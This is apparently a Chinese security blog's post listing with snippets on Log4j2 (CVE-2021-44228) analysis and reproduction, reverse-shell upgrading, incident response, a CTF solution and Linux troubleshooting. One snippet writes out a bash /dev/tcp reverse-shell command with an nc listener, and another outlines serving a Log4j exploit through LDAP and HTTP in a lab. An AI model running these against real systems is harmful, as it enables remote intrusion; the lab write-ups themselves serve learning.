- 博客(33)
- 资源 (8)
- 收藏
- 关注
RSS订阅
原创 Apache Log4j2 远程代码执行漏洞分析+检测+防护
分析: Apache Log4j2是一款开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中,用来记录日志信息。由于ApacheLog4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在目标服务器上执行任意代码。漏洞PoC已在网上公开,默认配置即可进行利用,该漏洞影响范围极广,建议相关用户尽快采取措施进行排查与防护。 根据Iog4j的用途和复现的情况来看,攻击入口取决于Iog4j从线上业务的哪些地方取数据放入 logger.error,...
2021-12-10 10:33:04
12175
3
原创 反弹Shell升级为交互式Shel
前言经常我们拿到的shell是一个简单的shell如何把一个简单的shell就升级到一个标准交互式shell写这篇文章记录一下正文攻击机:kali靶机:ubuntu普通Shell给kali弹shellbash -i >& /dev/tcp/192.168.145.128/4444 0>&1kali:nc -lvvp 4444然后发现这个shell有很多问题无法使用vim等文本编辑器不能补全不能su没有向上箭头使用历史等等.
2022-04-27 11:30:49
1731
原创 记录应急踩过的坑
Linux应急响应中,我们遇到有ia锁的,通过chattr可能修改不了,原因是crontan 实时写入导致停不了,加/解不了锁,这时候我们要用kill -STOP停掉进程,而不是kill -9。扩展知识:爆破应急1、统计了下日志,确认服务器遭受暴力破解grep -o "Failed password" /var/log/secure|uniq -c2、输出登录爆破的第一行和最后一行,确认爆破时间范围:grep "Failed password" /var/log/secure|hea
2022-02-23 12:51:33
4050
原创 Linux可执行文件No such file or directory
最近在使用Linux操作系统执行一个可执行文件,结果出现了No such file or directory的提示,表示很疑惑。 ./tshrfbash: ./tshref: No such file or directory123查看文件信息,可以看到文件是存在的,并且是可以执行的。 -rwxr-xr-x 1 yuan yu...
2022-02-23 12:46:00
440
原创 Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程
首先我们要理解漏洞产生的原因,存在漏洞的机器为LDAP客户端,我们构造payload地址为自己的LDAP服务端,自己服务端会去HTTP服务器加载恶意文件。(验证的话,payload直接为DNS服务器即可)以github上项目为例:GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行一、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载git clone https://gith...
2021-12-13 11:35:02
7123
原创 git出错:“Please make sure you have the correct access rights and the repository exists.
ssh 需要重置1、充值用户名和邮箱git config --global user.name “yourname”git config --global user.email“your@email.com"注:yourname是你要设置的名字,your@email是你要设置的邮箱。2、删除.ssh文件夹下的known_hosts3、git输入命令 $ ssh-keygen -t rsa -C "your@email.com"(请填你设置的邮箱地址) 一路yes和回车 然后系统
2021-12-10 15:54:41
123
原创 查看页面源代码和F12(检查)的区别
查看源代码:就是别人服务器发送到浏览器的原封不动的代码,也就是最原始的代码。(F12)检查元素:看到的就是最终的html代码。即:源代码 + 网页js渲染 。【注】在源代码中找不到的代码,是在浏览器执行js动态生成的。当我们在爬虫时需要对js在加载的数据进行爬取时,就不能像普通爬虫一样进行获取了,这时通常有两种方法:1. 通过selenum自动化技术2. 通过在页面上进行抓包,获取js链接以及表单元素进行请求...
2021-11-22 14:33:41
2380
原创 2021B站1024程序员节 网络攻防
第一题:加密方式:AES 加密加密模式:ECB填充方式:无影响,都可以Key:hAPPy_1024_223396 位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156输出方式:Hex(十六进制)解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9第二题:F12-Sources-webpa
2021-10-25 13:52:54
7333
原创 Linux执行可执行文件提示No such file or directory的解决方法
最近在使用Linux操作系统执行一个可执行文件,结果出现了No such file or directory的提示,表示很疑惑。查看文件信息,可以看到文件是存在的,并且是可以执行的。查阅资料后,原因是系统位数与该可执行文件需要的lib库位数不匹配。用uname命令打印系统信息,发现系统是64位系统用file命令查看文件信息,发现是一个32位可执行文件。要想在64位系统上与运行32位程序,则需要安装32位lib库。对于Ubuntu用户可以使用下面的命令安装。sud..
2021-10-20 16:10:18
13491
原创 kali linux更新问题
kali linux在安装后默认用的是国外的软件源,更新软件或者下载新的软件非常慢,而且很容易失败,所以我们需要第一时间更新软件源,这里分享一下更新软件源的方法。1.vim /etc/apt/sources.list 进入编辑模式 ,先按一下 i 键 ,粘贴命令是p, 编辑好了再单击Esc 键,再按一下 :wq 保存退出2.将国内比较好用的源复制进去,如下:#zhongkedadeb http://mirrors.ustc.edu.cn/kali kali-rolling main non-fr
2021-10-19 10:04:26
382
原创 蓝奏云链接打不开,原因以及解决办法。
原因:dns解析有问题三种解决方法:1.删掉www2.删掉lanzous后面的s。或者s也可以改为i3.www改为pan(其实改为任何英文和数字都可以,例如本人一直使用http://1.lanous.com)
2021-10-18 10:57:36
7690
马哥cookie强力注入工具
2022-10-19
蓝队分析辅助工具箱BlueTeamTools
2022-10-19
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人